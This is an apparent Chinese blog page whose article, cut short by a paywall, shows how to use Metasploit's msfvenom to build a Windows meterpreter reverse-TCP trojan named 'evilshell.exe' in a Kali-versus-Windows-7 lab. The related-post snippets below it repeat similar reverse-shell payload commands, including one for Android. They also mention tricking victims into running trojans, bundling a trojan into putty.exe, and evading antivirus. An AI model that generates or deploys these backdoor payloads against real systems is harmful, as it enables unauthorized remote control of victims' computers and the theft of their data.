使用Metasploit生成木马控制Windows系统

最新推荐文章于 2025-05-22 20:50:28 发布
最新推荐文章于 2025-05-22 20:50:28 发布
阅读量2.3k 收藏 20
点赞数 2
CC 4.0 BY-SA版权
文章标签: linux 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_56956399/article/details/124125364

一、环境准备

攻击机:kali     IP:192.168.63.53

靶机:Windows 7         IP:192.168.63.128

1、保证两台机器间可以互相ping通

 

2、关闭Windows防火墙、kali防火墙

二、kali生成木马

1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.63.53 lport=5555 -f exe >/home/ices/桌面/evilshell.exe

      参数解释:

-p -playload 攻击成功后做什么

-p ,-payload Payload to use:指定哪些有效载荷生成

-f, -format Output format:指定有效载荷的格式

  -f  后跟要生成后门文件的类型

      2、将木马文件evilshell

最低0.47元/天 解锁文章

200万优质内容无限畅学
Metasploit 生成木马
2201_75516783的博客
11-28 919
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1629
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
Metasploit(MSF)生成木马教程,一次windows入侵记录(教程)
weixin_62860907的博客
07-18 618
打开靶机(我使用的是中国蚁剑,靶机中我上传了后门,上传了生成木马5E.exe)第二部,生成木马,设置攻击机的IP地址以及接收shell的端口。我也是初学这,进去之后都不知道该干嘛,提权什么的,一概不会。第三步,开启msf控制台,设置payload,开启监听。首先查看一下IP地址吧。上线成功,拍张照片看看。
【2025最新版】超详细Metasploit安装保姆级教程,Wireshark抓包(网络分析),收藏这一篇就够了
A1_3_9_7的博客
05-22 957
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit使用框架以及利用漏洞。
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windowslinux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2724
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
Metasploit (MSF) 使用生成木马payload
2301_79642494的博客
10-29 2532
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targets和show payloads可查看target和payload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除并重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同样使用-K可以删除全部session会话。
Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了
logic1001的博客
11-07 910
上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取 meterpreter 之外,还可以直接通过木马获取。msfvenom 就是 MSF 中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得 meterpreter。msfvenom 是 msfpayload 和 msfencode 的组合,将这两个工具集成在一个框架实例中。
使用Metasploit生成木马获取Windows控制权实验
"该实验是关于网络攻防的实践,主要使用Metasploit框架来生成木马,以获取Windows系统的远程控制权。实验环境包括Windows 10操作系统和Kali Linux虚拟机,其中Kali Linux作为攻击机,利用内置的msfvenom工具创建木马...
metasploit生成木马程序
最新发布
06-02
以下是一个完整的示例,展示如何为Windows系统生成木马程序并设置监听器: ```bash # 生成木马程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe # 启动...
termux怎么生成木马_metasploit 生成木马常用命令
weixin_39926040的博客
12-21 1492
生成反弹木马:1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > ap...
Metasploit生成木马
clown_YZ的博客
02-15 554
Metasploit
Metasploit -- 木马生成原理和方法
Web安全工具库
05-07 2442
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
msfvenom
jsd2root的博客
11-02 578
1.msfvenom的基本用法: Options:     -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: pa
Metasploit实验之上传木马
wjy的博客
03-12 1133
使用Metasploit创建木马并在靶机windows上运行
Metasploit的简单木马免杀技术及后渗透面临的问题
Grey的博客
04-17 1757
一. 配置ngrok准备内网穿透内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:https://ngrok.com/。我注册的时候面临验证码刷不出来,所以建议选择用github账号登陆就好。登陆好之后就在kali下载好对应版本的客户端。下载好之后你需要在kali上用他给你的凭证进行登...
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1776
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
木马与免杀(1), msfvenom 工具, 木马生成, 编码免杀, 在线木马检测
探测???
12-06 1257
Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错[5]。
KalilMetasploit生成cmdshell(未免杀)
tiaotiaolong99234的博客
05-30 975
众所周知,Metasploit是一款开源的安全漏洞检测工具,这个框架并不仅仅局限于Linux上,在windows上同样可以大放光彩,但是由于在windows上的安装稍有点麻烦,并且Kali也早已经将其集成在自己的OS中,所以很多安全人士也依赖于在Kali上将Metasploit作为自己的重要工具。       其上集成了相当多的漏洞利用,以及ShellCode(PAYLOAD) 并且拥
metasploit制作木马程序
Chaos
11-15 2320
第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:   1)百度搜索,下载原版putty程序   2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值